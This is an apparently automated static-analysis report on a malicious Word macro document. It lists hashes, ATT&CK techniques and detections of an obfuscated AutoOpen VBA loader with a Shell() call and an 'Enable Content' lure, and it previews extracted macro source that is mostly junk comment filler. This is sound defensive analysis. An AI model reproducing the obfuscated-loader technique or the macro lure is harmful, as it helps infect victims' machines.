Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0936354aa36df993…

MALICIOUS

Office (OLE)

213.5 KB Created: 2018-10-22 14:01:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: 7e7d7fc6413ea8eab79e1f944fba33fd SHA-1: ccf3642e310dbf1a1cad414489c0eee8eeedf5ab SHA-256: 0936354aa36df993d818a1c5e1932ede531089b7c774fba3baaac446a755e219
322 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains obfuscated VBA macros with an AutoOpen entry point, indicating it's designed to execute automatically when the document is opened. The 'Shell()' call within the VBA code is a critical indicator of malicious intent, likely used to download and execute a secondary payload. The document body explicitly instructs the user to 'Enable Content', a common social engineering tactic to bypass macro security.

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6923090-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6923090-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 149418 bytes
SHA-256: 92026ac5b34c677100066918ab33853530bab0200c813eea2604fa8f8562d04c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' f dft .dTEi.unF o bd ETSineI  IEndnnFnoeu b
' eif.ufSbTetu  o  Tdnnfdb n.  .ccEdFEu InuITucn  n Edinn SeSIEEnn TnEttc   F  icn o unT Fendo  Scd
' innn fE.nSSndo  e T tuS nE  be hicnenntSnn o.ntI.hnoiFidefuebnISd nde
' nuun FFddc.n nt .eccn tunid Fu b ncnh no
' o IIoTEoTIcSS hioSFehnhfFuSSonoc.EFitnu TnnSId I.n EeSuInuFSndS  b FodIbubihd Snoi.SIEFn.nEubeES
'  fcnn   tbd  du  t EiEcuFn.EFcn   TnIuEenFnIEn.tnS ictE STnTfhdS
' u SE  uoiTnuEcnnn.Fu uEenoe eEbT
' nedt  e fFuidn nStcn t  Tn bId b nhuFunofh u n bbhn  nhd inF dFd.uTIhIo
' bEh   unS  dfcSIo.tbtnFIFFnhe Ee doF hu.F n budFhu ub heIScbEfedoen c nEn
' eFT Ii Iuu tISe cutIen ocFEuon.b tScF f  n nuhIun TFicSnn
' bIoFdcII  fu.uhnno.nc.bdndthF  un bT nbon uoiu .e.inne c ndhTETFnoSTeuo cEIn Fhfho Fhnn EcITioFdt n
' n.inu  f F.he b InnbuIonce udnd n fd dnEInn.fn E EotI nnETbSt c  nIuhEecIdo
' nfeTb  bF ocnef du  FTTic .u.IIue.FnhTn  uTu  euntnuSn SIndfc hTdnt  uFeeboSTun ocFIn n n inTIi
' fTF.ndSIn Sb I unncchFnE I ouhconu.I
' c  Iin dunIcoSe FoSnnoih  u nnSt  tFiuenntSIeFh. nnFcT cinenno TofTdTinF .un   Ffe
' ode hfntf eEuinbnIEnubucnEFhEc EE Suc F on dinnnT nE.nn   Fihe  Fu.FcnunTnthuun TdTn nn   n  ne
'   nfcibneTEdnndIn InIte EdE oc neT hit  ie.f.nnnoec nnnn t n.
' fFT e unuFhFhnnEESnn  iuiioiETuTdubufnfo u SEentFcti f  n. uh idEnTn  . nnhb c.bnenT
' n Enuen nd oFnc i.tSTu   ouceiuncFiu
' Etnbtcn.TSIEEbnn  nu bi fS o
'   nhI tt F i nn Ef  onnT ST Fdnu u.oTf.I uot Iounict Ehon oIhSofuIuofubT IiuubuTnfd.b E
' tu bSbnbtub nFineSTtihtub  FSnFtFdScfTcoFndnT nnnbnnIFFh cndn nI i  uFeTIeEcTbtd I
' cftEuidSc nffnf .ffn hIn n  nnbTnFFt   EtfooFdb S tiE  nd FI
' u uucf.dih hh nfoEuh uE.udhi onhe
' .toe.fnFfeEdnt i  nI iun FfEnenc.dncueueh IS.fTFtIo.ninI nnffthbif ceunFdbIf.F
' III.i TF .b cSnd c u nnn uouFIniI ctu TuftnIfhtEuSn  EtnunnSn buninFFiucStnnhcIbe
' .TcIdnnci nn iSceue cn. b  TdeintiFuTnibu ohTiuf. en
' Io InhIuuT eunbbT be  h u ino T  TnuttnSb d T
' .Fid Sc.dFSd oEuE ntfbFch.nn SSdno.E nS n i IdSn n
' bTn.utcn.   nnTE f ..   nI oTinhicnEo n bTFniccttSnnnfInT TS.dedni
'  fuE nnfhEuInnnFh.binbeS Eh n binF cuT ncnfIib IFoftI e.iucnnfu E En
'  u.unonbh bonondon.n bnSuuccn eShnF nd uunIebnIddf F tu nhtddIuhcTonh. ub.nf cEcune
'  hfnuhdeiEdiE EuftdEh c fIEdt uudSb S on EunE  fh uf Th.c. TnF  eTnheF    ntSuo.nS dE
' cuiSo  nu nnoneSn   IT bhTiT b Su
' dnT  b.EhciEnnc nudeS ue.Fcth.cnen bnt nn hcEhI IF i F  b ni   SFneenbTEuIdnn
'  todnIhdon  bni hSEudht d b.tIhffnuffeThbuEn E .b dFS.  ohdeciTf ncnToee tEnnu tn .e  nnS hoeEc.f
' fFSbbufn un i  uuoEnEdTfFuuTfnbnntb  ohhben Ff.iEunob  ESfb   hFdTfn ft  nS  hbd .nFbfn IS tftn
' Sbnnfn n uncu In obodTuTdcbSieSnhnnFnn noc  uTu. dbuu infFdcfe  ETFnFdEdb TebInF tSdfnf
' in  Itnu nuchT  dcu funfTbFi nin.uF nfoueT uoIninh
' f  fn u uuFnTbce ES IInffunnFh.dT neihfdnfEcudc T u nhFhuhFnoFE tndoi
' .T c hTuEth n Ece IfSnubFeS.FoSbIhunEbESnF ucfe it nnFtF.uennuSeu iTiT ebhi.und SuiIn
' btfnofFdhcfnTuTif .ufd TucFcS fuiE nnunu huI I nufohduudSb   neT . nSnhbtnde      ic cdEncc F  n F
' i eS u .bd.no fSn n uF.F  ud  neibTIhn u I.bdF ie nnIFStdnn.boSnnbn
'   F Ibinh fEndun Ffhd  SufnnFdntnSeFF uuE iE.InE I  e c ISef.nFIcnubSuuuonbS
' dubfeduEuoItidn  uIno  .  FSn u
' nhdIunnTu u.oh   nnnh  Ff ch Sn
' .TIncfcu tFFooFhn nEbnoiS de   .hcfFn Fhn Tf . n
' huInfnnIuci ISEh iT TEn idnS  uteSn uFo tonFn
'   TIecuEninh FonFitnenhouFd icE  nnn
' fn  en h.ETnS tnhoc EufI uo u ne TnuIdS. tn TnE udfu. c STutnoFnddftc  t c nhhEbIuubnin Tf T.chnn
' F    n c hI cnnniFE uuInnuTh Sn ncunn Enh  inc I.Sfii   tIFb TtS.  oS
' EF eehbnI n  Tn uIct ebE o.T FIndun Tn  tncS .e
' ITooneEnhuun dIuubIT tfIFonnTot.hbti  Suctd nFu Iu.t
' dc cF Su. bhT cnFcieb.honuunci nnE T.edeo
' te. . b   uffnnnn dcnfbSnne
... (truncated)